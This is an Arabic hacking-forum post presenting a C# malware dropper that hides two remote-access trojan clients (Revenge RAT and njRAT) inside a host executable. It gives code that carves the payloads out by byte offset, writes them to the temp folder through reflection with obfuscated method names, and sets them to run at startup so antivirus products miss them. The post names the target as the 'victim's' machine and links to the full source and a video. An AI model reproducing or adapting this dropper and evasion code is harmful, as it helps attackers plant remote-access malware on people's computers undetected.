01.12.2017 [MixedAssemblyLoader] [Run Tow Assmblies Under One Process]


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,571
2,967
1
حياكم الله ياشباب
شفت السورس هنا بالجيت هاب

GitHub - CodeCrackerSND/MixedAssemblyLoader: load mixed assemblies (.NET) C# source code

ولاستخدام اللودر يجب ان يكون هنالك ملف بجهاز الضحية يتم عمل له لود
C#:
MixedLoader.LoadMixedAssembly("File Path",false).EntryPoint.Invoke(null,null)
طيب ان قلنا مننسخ الاسمبليز "مثلا 2 كلاينت لريفينج رات وللانجي رات"
بقول لك ان بالطريقة القديمة
File.WriteAllBytes
انسى الموضوع بجيبوك الحمايات
الحل بموضوعي هنا
انسخ سيرفرك على الهارد وثبته بدون اي حركة من الحمايات [Nod-KasperSky-Avast-Windows Defender..Etc]

طيب السيرفرين الخاصين بك وين رح يكونو عندك خيارات "وكلها سيئة" وهي
ريسورس .. امبيديد ريسورس .. تحميل من النت ..تضمينهم بشكل او بآخر بالسورس "بايت اراي او اي نوع سترينج"
او وضعهم بجانب الملف الاصلي باي اسم وامتداد
انا اللي سويته جديد عالسوق
قلت منحقن البايتات للكلاينتين بالملف الاصلي
ومنعمل كتابة للبايتات بطريقتنا القديمة ..
بس كيف يعرف البايتات اللي لازم ينسخهم يعني من اي اوفست لاي اوفست
رح نحتاج الفانكشن الاولى
C#:
static byte[] Hh(byte[] bb)
      {
          var test2 = new byte[16896];
          Array.Copy(bb, 24576, test2, 0, test2.Length);
          return test2;
      }
رح تحجز بايت اراي لاول سيرفر من بعد 24576 بطول 16896
واللي هو لينجث الملف الاول "السيرفر الاول سيرفر ريفينج رات"
ورح نحتاج لفانكشن ثانية
C#:
static byte[] Hh2(byte[] bb)
        {
            var test2 = new byte[24064];
            Array.Copy(bb, 41472, test2, 0, test2.Length);
            return test2;
        }
رح تتجاوز 41472 واللي هي عبارة عن لينجث السورس + لينجث الكلاينت الاول "سيرفر الريفينج رات"
لان رح نحقن بعدها بايتات الكلاينت الثاني "انجي رات"
والطول الخاص به عندي هو 24064 حجزنا له بايت اراي جديدة

الان لكتابة البايت اراي ذولا يكفي التالي
للبايت اراي الاولى "كلاينت الريفينج رات"
C#:
//Copy Client 1
                   typeof(File).GetMethod(BS(Windows()),
                       new[] {typeof(string), typeof(byte[])})?.Invoke(null,
                       new object[] { Path.GetTempPath() + "Bashar.exe", Hh((byte[])typeof(File).GetMethod(BS(Microsoft()),new[] {typeof(string)})?.Invoke(null, new object[] {Application.ExecutablePath}))});
للبايت اراي الثانية "كلاينت الانجي رات"
C#:
//Copy Client 2
                   typeof(File).GetMethod(BS(Windows()),
                       new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                       new object[] { Path.GetTempPath() + "Bashar2.exe", Hh2((byte[])typeof(File).GetMethod(BS(Microsoft()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath })) });
ورح يتم تثبيت الملف الناتج عن السورس ببدء التشغيل
واللي مسؤول عن تشغيل الكلاينتين سويا
وبالعمليات رح تظهر فقط عملية ناتج السورس مش رح ولاعملية باسم
Bashar1.exe
او
Bashar2.exe
واللي هنن شغالين بس من خلال ناتج السورس ..
بالبروسس هاكر مارح يظهرو تحت العملية الاساسية ابدا ..
السورس بالمرفقات والفديو بالرابط هنا
https://drive.google.com/file/d/1d6zQ76Tw18X8dV0mVHGw7pdWBnbzGhSK/view?usp=sharing

 

المرفقات

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك